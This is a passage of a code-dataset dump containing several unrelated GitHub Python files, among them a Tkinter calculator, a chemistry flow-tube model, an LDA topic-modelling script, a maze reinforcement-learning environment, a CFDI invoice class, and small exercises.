len(self.lists) == 0:\n self.rst1.set(\"0\")\n else:\n com_str = \"\".join(self.lists)\n self.rst1.set(com_str)\n else:\n self.rst2.set(\"没有要删除的对象\")\n\n def menu_tools(self):\n menubar = Menu(self.master)\n aboutmenu = Menu(menubar, tearoff=0)\n moremenu = Menu(menubar, tearoff=0)\n aboutmenu.add_command(label=\"关于\", command=self.about)\n moremenu.add_command(label=\"更多\", command=self.more)\n menubar.add_cascade(label=\"Creator\", menu=aboutmenu)\n menubar.add_cascade(label=\"帮助\", menu=moremenu)\n self.master.config(menu=menubar)\n def about(self):\n messagebox.showinfo(\"Message\", \"Desinger by mengen\")\n\n def more(self):\n messagebox.showinfo(\"Help\", \"还没有写好帮助文档,有时间在写\")\n\n def show_info(self, e):\n messagebox.showinfo(\"快捷键窗口\", \"人生弯弯曲曲水\\n岁岁重重叠叠山\")\n\n\nif __name__ == '__main__':\n root = Tk()\n Calculator(root)","repo_name":"mengen9/code_notebook","sub_path":"2020_python/PythonTkinter项目实战/计算器.py","file_name":"计算器.py","file_ext":"py","file_size_in_byte":8149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"18205401446","text":"def cmd_calib5(const_comp_conc, params, Init_comp_conc, Q1, Q2):\n # %% import packages\n import numpy as np\n import RO2_conc\n import sch_interr\n import eqn_interr\n import eqn_pars\n import init_conc\n import RO2_indices\n import rate_coeffs\n import write_rate_file\n import cal_const_comp_conc\n from judg_spe_reac_rates import jude_species as jude_species\n from get_diff_and_u import get_diff_and_u_for_more_species\n from get_formula import get_formula\n from model_1 import model_1\n from model_3 import model_3\n from model_4 import model_4\n from meanconc_cal import meanconc_cal\n from 
grid_parameters import grid_para as grid_para\n\n # % load the inputs\n T = params['T'] # constant species\n p = params['p'] # temperature\n R1 = params['R1'] # diameters for first tube\n R2 = params['R2'] # diameters for second tube\n L1 = params['L1'] # length for first tube\n L2 = params['L2'] # length for second tube\n Q1 = Q1 / 60 # flow for first tube\n Q2 = Q2 / 60 # flow for second tube\n sch_name = params['sch_name'] # file for the MCM file\n chm_sch_mrk = ['{', 'RO2', '+', '', '', ';', '+', ';', '$', '{', ':', ';', '}'] #params['chm_sch_mrk'] # markers to isolate sections of chemical scheme based on MCM KPP format\n const_comp = params['const_comp']\n Init_comp = params['Init_comp']\n Diff_setname = params['Diff_setname']\n Diff_set = params['Diff_set']\n con_infl_nam = const_comp\n Zgrid = params['Zgrid'] # number of grid points in tube length direction\n Rgrid = params['Rgrid'] # number of grid points in tube radius direction\n key_spe_for_plot = params['key_spe_for_plot'] # key species for plot\n plot_spec = params['plot_spec'] # plot species\n dt = params['dt']\n flag_tube = params['flag_tube']\n const_comp_free = params['const_comp_free'] # the species in dilution flow\n const_comp_conc_free = params['const_comp_conc_free']\n\n # read the file and separate the equations and rate coefficients\n eqn_list, num_eqn, rrc, rrc_name, RO2_names, eqn_list_on = sch_interr.sch_interr(chm_sch_mrk, sch_name)\n #print(eqn_list_on)\n # find the comp_namelist reac_coef, and indx for products and reactants\n [rindx, rstoi, pindx, pstoi, reac_coef, nreac, nprod, comp_namelist, comp_num] = eqn_interr.eqn_interr(\n num_eqn, eqn_list, chm_sch_mrk)\n # find RO2 and the constant concentration\n RO2_indx, HOMRO2_indx, con_C_indx = eqn_pars.extr_mech(sch_name, chm_sch_mrk,\n con_infl_nam, const_comp)\n\n RO2_indi = RO2_indices.RO2_indices(comp_namelist, RO2_names)\n # get the diffusion for all species and the index of species in C except constant compounds\n\n u, Diff_vals = get_diff_and_u_for_more_species(comp_namelist, Diff_setname, con_C_indx, Diff_set, T, p)\n\n numLoop = 500 # number of times to run to reach the pinhole of the instrument\n timesteps = 1000 # number of timesteps, dt * timesteps * numLoop is time elapsed in the final solution\n\n # Change odd number Rgrid to even number grid\n if (Rgrid % 2) != 0:\n Rgrid = Rgrid + 1\n # % apply all the concentration for the constant comp\n const_comp_gird = cal_const_comp_conc.cal_const_comp_conc(Rgrid, Zgrid, const_comp_conc, L1, L2, const_comp)\n # % set the concentration for all the species for the grid of 80*40 in c\n c = np.zeros([Rgrid, Zgrid, comp_num])\n\n for i in Init_comp: # set [OH] at z = 0 # set [HO2] at z = 0 [oh]\n c[:, 0, comp_namelist.index(i)] = Init_comp_conc[Init_comp.index(i)]\n for i in const_comp: # set the constant concentrations for const_comp\n c[:, :, comp_namelist.index(i)] = const_comp_gird[const_comp.index(i)]\n\n # % write the rate coefficients in a new file (rate_coeffs.py)\n write_rate_file.write_rate_file(reac_coef, p, rrc, rrc_name, 0)\n # % store the first column of the initial concentration into C0\n C0 = c[0, 0, :]\n # % store indx for products and reactants to dydt_vst, and the initial concentration for first column\n [y, M, dydt_vst] = init_conc.init_conc(comp_num, comp_namelist, C0, T, p, comp_namelist, \\\n rindx, pindx, num_eqn[0], nreac, nprod,\n comp_namelist, \\\n RO2_indx, HOMRO2_indx, rstoi, pstoi)\n # % calculate the RO2 concentration\n RO2conc = RO2_conc.RO2_conc(RO2_indi, y)\n # % calculate 
H2O, O2, NO, HO2, NO3\n op = jude_species(y, comp_namelist)\n # % calculate reaction rate coefficients values\n\n rate_values = rate_coeffs.evaluate_rates(RO2conc, T, 0, M, M * 0.7809, op[0], op[1], op[2], op[3],\n op[4], p)\n # used as the title for the plotted figures\n formula = get_formula(plot_spec)\n # % set the grids parameters\n Rtot, dr, dx, sp_line = grid_para(Zgrid, Rgrid, R2, R1, L2, L1, comp_num)\n #print(rate_values)\n #print(comp_namelist)\n #print(comp_num)\n # %% run the modules and plot\n if flag_tube == '3':\n c = model_3(R2, R1, Rgrid, Zgrid, comp_num, L2, L1, numLoop, comp_namelist, key_spe_for_plot, dt, timesteps,\n Diff_vals, Rtot, Q1, Q2, dydt_vst, rindx, nreac, rstoi, rate_values, const_comp, u, plot_spec,\n formula, c, dr, dx,params['model_mode'],const_comp_conc)\n elif flag_tube == '4':\n c = model_4(R2, R1, Rgrid, Zgrid, comp_num, L2, L1, numLoop, comp_namelist, key_spe_for_plot, dt, timesteps,\n Diff_vals, Rtot, const_comp_free, const_comp_conc_free, Q1, Q2, dydt_vst, rindx, nreac, rstoi,\n rate_values,\n const_comp, u, plot_spec, formula, c, dr, dx,params['model_mode'])\n else: # model 1 and model 2 they are same\n # % run once with two different tubes or one tube\n c = model_1(R2, Rgrid, Zgrid, L2, L1, numLoop, comp_namelist, key_spe_for_plot, dt,\n timesteps, Diff_vals, Rtot, Q1, dydt_vst, rindx, nreac, rstoi, rate_values, const_comp, u,\n plot_spec, formula, c, dr, dx, params['model_mode'])\n # % calculate the meanconc for each species\n meanConc = meanconc_cal(R2, Rgrid, plot_spec, comp_namelist, c, params['model_mode'])\n\n return meanConc, c","repo_name":"momo-catcat/MARFORCE-flowtube","sub_path":"PANDA520_flowtube/Funcs/cmd_calib5.py","file_name":"cmd_calib5.py","file_ext":"py","file_size_in_byte":6337,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"22813167006","text":"preço = float(input('Informe o preço normal: '))\ncondição = int(input('Informe a condição de pagamento:\\n[1]- Dinheiro/cheque\\n[2]- Cartão\\n[3]- Cartão(2x)\\n[4]- Cartão(3x ou +)\\nSua Opção:'))\n\nif condição == 1:\n dinheiro = preço - (preço * 0.10)\n print('Pagando á vista você recebe um desconto de 10%, o valor final do item será R${:.2f}'.format(dinheiro))\n\nelif condição == 2:\n dinheiro = preço - (preço * 0.05)\n print('Pagando no cartão você recebe um desconto de 5%, o valor final do item será R${:.2f}'.format(twox, dinheiro))\n\nelif condição == 3:\n total = preço\n parcela = total / 2\n print('Sua compra será parcelada em 2x de R${:.2f}, O valor final do item: R${:.2f}'.format(parcela ,preço))\n\nelif condição == 4:\n parcela = int(input('Quantas parcelas: (3x ou +)\\nInforme:'))\n juros = (preço / parcela) + (preço * 0.20) / parcela\n final = preço + (preço * 0.20)\n print('Sua compra será parcelada em {}x de R${:.2f} COM JUROS\\nSua compra de R${:.2f} vai custar R${:.2f} no final'.format(parcela, juros, preço, final))\n\nelse:\n condição = 0\n print('Opção invalida de pagamento')\n ","repo_name":"Gabrielsb1/Python","sub_path":"Exercicios em python/ex44.py","file_name":"ex44.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"28355903932","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue May 8 06:34:07 2018\r\n\r\n@author: logaprakash\r\n\"\"\"\r\n\r\nfrom collections import defaultdict\r\nfrom pyspark import SparkContext\r\nfrom pyspark.mllib.linalg import Vectors\r\nfrom pyspark.mllib.clustering 
import LDA\r\nfrom pyspark.sql import SQLContext\r\nimport re\r\nimport numpy as np\r\nimport csv\r\nfrom time import time\r\n\r\na = time()\r\n\r\ndef document_vector(document):\r\n id = document[1]\r\n counts = defaultdict(int)\r\n for token in document[0]:\r\n if token in vocabulary:\r\n token_id = vocabulary[token]\r\n counts[token_id] += 1\r\n counts = sorted(counts.items())\r\n keys = [x[0] for x in counts]\r\n values = [x[1] for x in counts]\r\n return (id, Vectors.sparse(len(vocabulary), keys, values))\r\n\r\n\r\nsc = SparkContext('local', 'PySPARK LDA')\r\nsql_context = SQLContext(sc)\r\n\r\ndata = sc.wholeTextFiles('/home/sakshi/Documents/big_data/data/*').map(lambda x: x[1])\r\n\r\nnum_of_stop_words = 50 \r\nnum_topics = 15\t \r\nnum_words_per_topic = 100 \r\nmax_iterations = 35 \r\n\r\n\r\ntokens = data \\\r\n .map( lambda document: document.strip().lower()) \\\r\n .map( lambda document: re.split(\"[\\s;,#]\", document)) \\\r\n .map( lambda word: [x for x in word if x.isalpha()]) \\\r\n .map( lambda word: [x for x in word if len(x) > 3] )\r\n\r\n\r\ntermCounts = tokens \\\r\n .flatMap(lambda document: document) \\\r\n .map(lambda word: (word, 1)) \\\r\n .reduceByKey( lambda x,y: x + y) \\\r\n .map(lambda tuple: (tuple[1], tuple[0])) \\\r\n .sortByKey(False)\r\n \r\nthreshold_value = termCounts.take(num_of_stop_words)[num_of_stop_words - 1][0]\r\n\r\nvocabulary = termCounts \\\r\n .filter(lambda x : x[0] < threshold_value) \\\r\n .map(lambda x: x[1]) \\\r\n .zipWithIndex() \\\r\n .collectAsMap()\r\n\r\ndocuments = tokens.zipWithIndex().map(document_vector).map(list)\r\n#inv_voc = {value: key for (key, value) in vocabulary.items()}\r\n\r\nlda_model = LDA.train(documents, k=num_topics, maxIterations=max_iterations)\r\ntopic_indices = lda_model.describeTopics(maxTermsPerTopic=num_words_per_topic)\r\ntopic_document_matrix = lda_model.topicsMatrix()\r\ndocument_data_df = documents.map(lambda x: (x[0], x[1])).toDF((\"DocID\",\"Word_Counts\"))\r\nword_data = document_data_df.select('Word_Counts').rdd.map(lambda x: x[0]) \r\n\r\n\"\"\"\r\nVectorizing\r\n\"\"\"\r\ndocument_data_list = word_data.collect()\r\nnum_docs = len(document_data_list)\r\nvocab_len = len(vocabulary)\r\n\r\nvectors = np.zeros((num_docs,num_topics))\r\n\r\nfor document in range(0,num_docs):\r\n for topic in range(0,num_topics):\r\n for word in range(0,vocab_len):\r\n if document_data_list[document][word] != 0.0:\r\n vectors[document][topic] += document_data_list[document][word] * topic_document_matrix[word][topic]\r\n\r\n\r\n\r\n\"\"\"\r\nSaving required frames\r\n\"\"\"\r\nnp.savetxt(\"/home/sakshi/Documents/big_data/vectors.csv\", vectors, delimiter=\",\")\r\nnp.savetxt(\"/home/sakshi/Documents/big_data/topic_word_matrix.csv\", topic_document_matrix, delimiter=\",\")\r\n\r\nwith open('/home/sakshi/Documents/big_data/vocabulary.csv', 'w') as f: # Just use 'w' mode in 3.x\r\n w = csv.DictWriter(f, vocabulary.keys())\r\n w.writeheader()\r\n w.writerow(vocabulary)\r\n\r\n\"\"\"\r\nEnding session\r\n\"\"\"\r\nsc.stop()\r\n\r\nb = time() -a","repo_name":"logaprakash/Ranking-MRF","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":3446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"12565926839","text":"import numpy as np\nimport random\nimport json\nimport os\nfrom sklearn.metrics.pairwise import euclidean_distances\nimport math\nimport copy\n\n\nclass TwoStageSPVisualMaze:\n def __init__(self, config, 
randomSeed=1):\n \"\"\"\n A model take in a particle configuration and actions and return updated a particle configuration\n \"\"\"\n\n self.config = config\n self.randomSeed = randomSeed\n self.read_config()\n self.initilize()\n\n # self.padding = self.config['']\n\n def initilize(self):\n if not os.path.exists('Traj'):\n os.makedirs('Traj')\n # import parameter for vector env\n self.viewer = None\n self.steps_beyond_done = None\n self.stepCount = 0\n\n self.numStages = 2\n\n self.nbActions = [2, 1]\n\n self.info = {}\n\n self.Dr = 0.161\n self.Dt = 2.145e-14\n self.tau = 1 / self.Dr # tau about 6.211180124223603\n self.a = 1e-6\n self.Tc = 0.1 * self.tau # Tc is control interval\n self.v = 2 * self.a / self.Tc\n self.angleStd = math.sqrt(2 * self.Tc * self.Dr)\n self.xyStd = math.sqrt(2 * self.Tc * self.Dt) / self.a\n\n random.seed(self.randomSeed)\n np.random.seed(self.randomSeed)\n\n self.initObsMat()\n self.constructSensorArrayIndex()\n self.epiCount = -1\n\n\n def read_config(self):\n\n self.receptHalfWidth = self.config['agentReceptHalfWidth']\n self.padding = self.config['obstacleMapPaddingWidth']\n self.receptWidth = 2 * self.receptHalfWidth + 1\n self.targetClipLength = 2 * self.receptHalfWidth\n self.stateDim = (self.receptWidth, self.receptWidth)\n\n self.sensorArrayWidth = (2 * self.receptHalfWidth + 1)\n\n self.endStep = 500\n if 'episodeLength' in self.config:\n self.endStep = self.config['episodeLength']\n\n self.startThresh = 1\n self.endThresh = 1\n self.distanceThreshDecay = 10000\n\n self.targetThreshFlag = False\n\n if 'targetThreshFlag' in self.config:\n self.targetThreshFlag = self.config['targetThreshFlag']\n\n if 'target_start_thresh' in self.config:\n self.startThresh = self.config['target_start_thresh']\n if 'target_end_thresh' in self.config:\n self.endThresh = self.config['target_end_thresh']\n if 'distance_thresh_decay' in self.config:\n self.distanceThreshDecay = self.config['distance_thresh_decay']\n\n self.obstacleFlg = True\n if 'obstacleFlag' in self.config:\n self.obstacleFlg = self.config['obstacleFlag']\n\n self.actionPenalty = 0.0\n if 'actionPenalty' in self.config:\n self.actionPenalty = self.config['actionPenalty']\n\n self.scaleFactor = 20.0\n if 'scaleFactor' in self.config:\n self.scaleFactor = self.config['scaleFactor']\n\n self.obstaclePenalty = 0.0\n if 'obstaclePenalty' in self.config:\n self.obstaclePenalty = self.config['obstaclePenalty']\n\n self.transitionDistance = 3.0\n if 'transitionDistance' in self.config:\n self.transitionDistance = self.config['transitionDistance']\n\n\n def thresh_by_episode(self, step):\n return self.endThresh + (\n self.startThresh - self.endThresh) * math.exp(-1. 
* step / self.distanceThreshDecay)\n\n def constructSensorArrayIndex(self):\n x_int = np.arange(-self.receptHalfWidth, self.receptHalfWidth + 1)\n y_int = np.arange(-self.receptHalfWidth, self.receptHalfWidth + 1)\n [Y, X] = np.meshgrid(y_int, x_int)\n self.senorIndex = np.stack((X.reshape(-1), Y.reshape(-1)), axis=1)\n\n def getHindSightExperience(self, state, action, nextState, done, info):\n\n # if hit an obstacle or if action is to keep still\n if self.hindSightInfo['obsFlag'] or self.stageID == 0:\n return None, None, None, None, None\n elif self.stageID == 1 and not done:\n targetNew = self.hindSightInfo['currentState'][0:2]\n\n distance = targetNew - self.hindSightInfo['previousState'][0:2]\n phi = self.hindSightInfo['previousState'][2]\n\n sensorInfoMat = self.getSensorInfoFromPos(self.hindSightInfo['previousState'])\n\n # distance will be changed from lab coordinate to local coordinate\n dx = distance[0] * math.cos(phi) + distance[1] * math.sin(phi)\n dy = - distance[0] * math.sin(phi) + distance[1] * math.cos(phi)\n\n if self.obstacleFlg:\n state = {'sensor': sensorInfoMat,\n 'target': np.array(\n [dx / self.scaleFactor, dy / self.scaleFactor])}\n else:\n state = np.array([dx / self.scaleFactor, dy / self.scaleFactor])\n nextState = np.array([0.0, 0.0])\n\n actionNew = action\n # here [0, 0] is dummy input to ensure done is always true\n return state, actionNew, nextState, 1.0, True\n\n\n def getSensorInfo(self):\n # sensor information needs to consider orientation information\n # add integer resentation of location\n # index = self.senorIndex + self.currentState + np.array([self.padding, self.padding])\n phi = self.currentState[2]\n # phi = (self.stepCount)*math.pi/4.0\n # this is rotation matrix transform from local coordinate system to lab coordinate system\n rotMatrx = np.matrix([[math.cos(phi), -math.sin(phi)],\n [math.sin(phi), math.cos(phi)]])\n transIndex = np.matmul(self.senorIndex, rotMatrx.T).astype(np.int)\n\n i = math.floor(self.currentState[0] + 0.5)\n j = math.floor(self.currentState[1] + 0.5)\n\n transIndex[:, 0] += self.padding + i\n transIndex[:, 1] += self.padding + j\n\n # use augumented obstacle matrix to check collision\n self.sensorInfoMat = self.obsMap[transIndex[:, 0], transIndex[:, 1]].reshape(self.receptWidth, -1)\n\n def getSensorInfoFromPos(self, position):\n\n phi = position[2]\n # phi = (self.stepCount)*math.pi/4.0\n # this is rotation matrix transform from local coordinate system to lab coordinate system\n rotMatrx = np.matrix([[math.cos(phi), -math.sin(phi)],\n [math.sin(phi), math.cos(phi)]])\n transIndex = np.matmul(self.senorIndex, rotMatrx.T).astype(np.int)\n\n i = math.floor(position[0] + 0.5)\n j = math.floor(position[1] + 0.5)\n\n transIndex[:, 0] += self.padding + i\n transIndex[:, 1] += self.padding + j\n\n # use augumented obstacle matrix to check collision\n sensorInfoMat = self.obsMap[transIndex[:, 0], transIndex[:, 1]].reshape(self.receptWidth, -1)\n\n # use augumented obstacle matrix to check collision\n return np.expand_dims(sensorInfoMat, axis=0)\n\n def rewardCal(self):\n reward = 0.0\n\n # if pass the time limit and not finish give zero reward\n if self.stepCount > self.endStep:\n self.done['stage'] = [True for _ in range(self.numStages)]\n self.done['global'] = True\n print('not finish ', self.currentState, self.stageID)\n return reward, copy.deepcopy(self.done)\n\n\n distance = self.targetState - self.currentState[0:2]\n\n if self.is_terminal(distance):\n self.done['stage'][self.stageID] = True\n self.done['global'] = True\n 
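# target reached (inf-norm distance below 0.5, see is_terminal): grant the unit terminal reward and end the episode\n            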
reward = 1.0\n print('finish ', self.currentState, reward, self.stageID)\n\n return reward, copy.deepcopy(self.done)\n\n def step(self, action):\n self.hindSightInfo['previousState'] = self.currentState.copy()\n # update step count\n self.stepCount += 1\n # if self.customExploreFlag and self.epiCount < self.customExploreEpisode:\n # action = self.getCustomAction()\n jmRaw = np.array([random.gauss(0, self.xyStd) + 2.0 * action,\n random.gauss(0, self.xyStd),\n random.gauss(0, self.angleStd)], dtype=np.float32)\n\n\n\n\n\n # converting from local to lab coordinate movement\n phi = self.currentState[2]\n dx = jmRaw[0] * math.cos(phi) - jmRaw[1] * math.sin(phi)\n dy = jmRaw[0] * math.sin(phi) + jmRaw[1] * math.cos(phi)\n # check if collision will occur\n i = math.floor(self.currentState[0] + dx + 0.5) + self.padding\n j = math.floor(self.currentState[1] + dy + 0.5) + self.padding\n\n if self.obsMap[i, j] == 0:\n jm = np.array([dx, dy, jmRaw[2]], dtype=np.float32)\n self.hindSightInfo['obsFlag'] = False\n else:\n jm = np.array([0.0, 0.0, jmRaw[2]], dtype=np.float32)\n self.hindSightInfo['obsFlag'] = True\n\n\n # update current state using modified jump matrix\n self.currentState += jm\n # make sure orientation within 0 to 2pi\n self.currentState[2] = (self.currentState[2] + 2 * np.pi) % (2 * np.pi)\n self.hindSightInfo['currentState'] = self.currentState.copy()\n\n # transitions of stages\n distance = self.targetState - self.currentState[0:2]\n\n if self.stageID == 0 and np.linalg.norm(distance, ord=2) < self.transitionDistance:\n print('job passage', self.currentState, 'step', self.stepCount)\n self.done['stage'][self.stageID] = True\n self.stageID += 1\n\n\n\n reward, done = self.rewardCal()\n\n # distance will be changed from lab coordinate to local coordinate\n phi = self.currentState[2]\n dx = distance[0] * math.cos(phi) + distance[1] * math.sin(phi)\n dy = - distance[0] * math.sin(phi) + distance[1] * math.cos(phi)\n\n angle = math.atan2(dy, dx)\n if math.sqrt(dx**2 + dy**2) > self.targetClipLength:\n dx = self.targetClipLength * math.cos(angle)\n dy = self.targetClipLength * math.sin(angle)\n\n globalTargetX = self.currentState[0]+ dx * math.cos(phi) - dy * math.sin(phi)\n globalTargetY = self.currentState[1]+ dx * math.sin(phi) + dy * math.cos(phi)\n\n\n # update sensor information\n if self.obstacleFlg:\n self.getSensorInfo()\n\n self.info['stageID'] = self.stageID\n self.info['previousTarget'] = self.targetState.copy()\n self.info['currentState'] = self.currentState.copy()\n self.info['currentTarget'] = np.array([globalTargetX, globalTargetY])\n\n if self.obstacleFlg:\n state = {'state': {'sensor': np.expand_dims(self.sensorInfoMat, axis=0),\n 'target': np.array(\n [dx / self.scaleFactor, dy / self.scaleFactor])},\n 'stageID': self.stageID}\n else:\n state = {'stageID': self.stageID,\n 'state': np.array(\n [dx / self.scaleFactor, dy / self.scaleFactor])}\n\n return state, reward, done, self.info.copy()\n\n def is_terminal(self, distance):\n return np.linalg.norm(distance, ord=np.inf) < 0.5\n\n def reset_helper(self):\n\n\n\n self.currentState = np.array(self.config['currentState'], dtype=np.float32)\n self.targetState = np.array(self.config['targetState'], dtype=np.float32)\n # set target information\n targetThresh = float('inf')\n if self.targetThreshFlag:\n targetThresh = self.thresh_by_episode(self.epiCount) * max(self.mapMat.shape)\n\n if self.config['dynamicInitialStateFlag']:\n while True:\n col = random.randint(0, self.mapMat.shape[1] - 1)\n row = random.randint(0, 
self.mapMat.shape[0] - 1)\n distanceVec = np.array([row, col], dtype=np.float32) - self.targetState\n distance = np.linalg.norm(distanceVec, ord=np.inf)\n\n\n if self.mapMat[row, col] == 0 and distance < targetThresh and not self.is_terminal(distanceVec):\n break\n\n\n # set initial state\n print('target distance', distance)\n\n self.currentState = np.array([row, col, random.random() * 2 * math.pi],\n dtype=np.float32)\n\n if np.linalg.norm(distanceVec, ord=2) > self.transitionDistance:\n self.stageID = 0\n else:\n self.stageID = 1\n\n print('initial state, stageID', self.currentState, self.stageID)\n\n def reset(self):\n self.stepCount = 0\n self.hindSightInfo = {}\n self.info = {}\n self.epiCount += 1\n self.done = {'stage': [False for _ in range(self.numStages)], 'global': False}\n\n self.reset_helper()\n # update sensor information\n\n self.info['scaleFactor'] = self.scaleFactor\n self.info['stageID'] = self.stageID\n\n if self.obstacleFlg:\n self.getSensorInfo()\n\n distance = self.targetState - self.currentState[0:2]\n\n phi = self.currentState[2]\n dx = distance[0] * math.cos(phi) + distance[1] * math.sin(phi)\n dy = - distance[0] * math.sin(phi) + distance[1] * math.cos(phi)\n\n angle = math.atan2(dy, dx)\n if math.sqrt(dx**2 + dy**2) > self.targetClipLength:\n dx = self.targetClipLength * math.cos(angle)\n dy = self.targetClipLength * math.sin(angle)\n\n globalTargetX = self.currentState[0]+ dx * math.cos(phi) - dy * math.sin(phi)\n globalTargetY = self.currentState[1]+ dx * math.sin(phi) + dy * math.cos(phi)\n\n\n self.info['currentTarget'] = np.array([globalTargetX, globalTargetY])\n\n # angleDistance = math.atan2(distance[1], distance[0]) - self.currentState[2]\n if self.obstacleFlg:\n state = {'state': {'sensor': np.expand_dims(self.sensorInfoMat, axis=0),\n 'target': np.array([dx / self.scaleFactor, dy / self.scaleFactor])},\n 'stageID': self.stageID}\n else:\n state = {'stageID': self.stageID,\n 'state': np.array([dx / self.scaleFactor, dy / self.scaleFactor])}\n\n return state\n\n def initObsMat(self):\n fileName = self.config['mapName']\n self.mapMat = np.genfromtxt(fileName + '.txt')\n self.mapShape = self.mapMat.shape\n padW = self.config['obstacleMapPaddingWidth']\n obsMapSizeOne = self.mapMat.shape[0] + 2 * padW\n obsMapSizeTwo = self.mapMat.shape[1] + 2 * padW\n self.obsMap = np.ones((obsMapSizeOne, obsMapSizeTwo))\n self.obsMap[padW:-padW, padW:-padW] = self.mapMat\n np.savetxt(self.config['mapName'] + 'obsMap.txt', self.obsMap, fmt='%d', delimiter='\\t')","repo_name":"yangyutu/DeepReinforcementLearning-PyTorch","sub_path":"Env/CustomEnv/MultiStageMaze/TwoStageSPVisualMaze.py","file_name":"TwoStageSPVisualMaze.py","file_ext":"py","file_size_in_byte":14568,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"27"} +{"seq_id":"6896197601","text":"class CfdiComprobante:\n\n def __init__(self, version, fecha, sello, no_certificado, certificado, sub_total, moneda, total, tipo_comprobante, lugar_expedicion):\n self.xmlns = ''\n self.schema_location = []\n self.version = version\n self.serie = ''\n self.folio = ''\n self.fecha = fecha\n self.sello = sello\n self.forma_pago = ''\n self.no_certificado = no_certificado\n self.certificado = certificado\n self.condiciones_pago = ''\n self.sub_total = sub_total\n self.descuento = ''\n self.moneda = moneda\n self.tipo_cambio = ''\n self.total = total\n self.tipo_comprobante = tipo_comprobante\n self.metodo_pago = ''\n self.lugar_expedicion = lugar_expedicion\n self.confirmacion = ''\n 
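# nested CFDI elements (related CFDIs, parties, line items, taxes, complements); issuer, receiver and complements are populated via the methods below\n        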
self.cfdi_relacionados = ''\n self.cfdi_emisor = ''\n self.cfdi_receptor = ''\n self.cfdi_conceptos = []\n self.cfdi_impuestos = []\n self.cfdi_complemento = []\n self.addenda = ''\n\n def emisor(self, emisor):\n self.cfdi_emisor = emisor\n\n def receptor(self, receptor):\n self.cfdi_receptor = receptor\n\n def add_complemento(self, complemento):\n self.cfdi_complemento.append(complemento)\n\n def add_schema_location(self, schema):\n self.schema_location.append(schema)\n\n def comprobante_dict(self):\n return {\n 'cfdi:Comprobante': {\n '@xmlns': self.xmlns\n }\n }\n","repo_name":"adriancosme/facturacion-lib","sub_path":"src/cfdi_comprobante.py","file_name":"cfdi_comprobante.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"12188113546","text":"__author__ = 'jorgezavala'\nauthor__ = 'jorgezavala'\n\nfrom django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^profile', views.update_profile, name='profile'),\n url(r'^social_login$', views.social_login, name='social_login'),\n\n]","repo_name":"kinnevo/kic_alone","sub_path":"userprofile/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"32171122862","text":"from pandas import read_csv\nfrom sklearn import linear_model\n#from googleplaces import GooglePlaces\nfrom urllib.request import urlopen\nimport json\nimport warnings\n\ndef getplace(lat, lon):\n url = \"http://maps.googleapis.com/maps/api/geocode/json?\"\n url += \"latlng=%s,%s&sensor=false\" % (lat, lon)\n while True:\n try:\n v = urlopen(url).read()\n j = json.loads(v)\n components = j['results'][0]['formatted_address']\n flag = 0 # Successful data transfer in components \n print(components)\n except:\n flag = 1 # Unsuccessful data transfer in components\n if flag == 0:\n break\n\n\ndd = read_csv(\"Data.csv\", header=0, sep=\";\")\nX = dd[[\"year\"]]\ny1 = dd[[\"latitude\"]]\ny2 = dd[[\"longitude\"]]\ny3 = dd[[\"date\"]]\ny4 = dd[[\"month\"]]\nmodels = [('BayesianRidge', linear_model.BayesianRidge()),\n ('LassoLars', linear_model.LassoLars()),\n ('ARDRegression', linear_model.ARDRegression())]\nwith warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n year_input = input(\"Enter year for prediction of Terrorist attacks : \")\n year_input = float(year_input)\n for name,i in models:\n print(\"\\n\", name)\n print(\"===========================================\")\n clf = i\n clf.fit(X, y1)\n lat = clf.predict(year_input)\n for i in lat:\n new_lat = float(\"{0:.6f}\".format(i))\n print(\"Latitude : \", new_lat)\n clf.fit(X, y2)\n lng = clf.predict(year_input)\n for i in lng:\n new_lng = float(\"{0:.6f}\".format(i))\n print(\"Longitude : \", new_lng)\n clf.fit(X, y3)\n date = clf.predict(year_input)\n for i in date:\n dte = int(i)\n print(\"Date : \", dte)\n clf.fit(X, y4)\n month = clf.predict(year_input)\n for i in month:\n mnt = int(i)\n print(\"Month : \", mnt)\n print(\"Place deduced from latitude and longitude : \\n========\")\n getplace(new_lat, new_lng)","repo_name":"s10singh97/TAF","sub_path":"aa.py","file_name":"aa.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"17723073689","text":"#Loading dataframe \r\nimport pandas as pd\r\ncolumns = ['Year', 'No smoothing', 'Lowest', 'Africa', 'Asia', 'Europe' ,'North 
America', 'South America', 'Oceania']\r\ndf = pd.read_csv('Main_dataset_globalwarming.csv', names = columns)\r\n#print (df.tail())\r\n\r\n#Normalizing data by using min-max\r\nfrom sklearn.preprocessing import MinMaxScaler\r\npre_scaled = pd.DataFrame()\r\npre_scaled['Year'], pre_scaled['No smoothing'] = df['Year'], df['No smoothing']\r\nmin_max_scaler = MinMaxScaler()\r\ndata_minmax = min_max_scaler.fit_transform(pre_scaled)\r\nscaled_df = pd.DataFrame(data_minmax, columns = ['Year', 'No smoothing'])\r\n#print(scaled_df.tail())\r\n\r\n\r\n#Creating model\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import PolynomialFeatures\r\nX_train, X_test, Y_train, Y_test = train_test_split(scaled_df['Year'], scaled_df['No smoothing'])\r\n#print(X_train.tail())\r\nX_train_df, X_test_df = pd.DataFrame(X_train), pd.DataFrame(X_test)\r\n\r\ndegree_usr = 5\r\npoly = PolynomialFeatures(degree = degree_usr)\r\nX_train_poly, X_test_poly = poly.fit_transform(X_train_df), 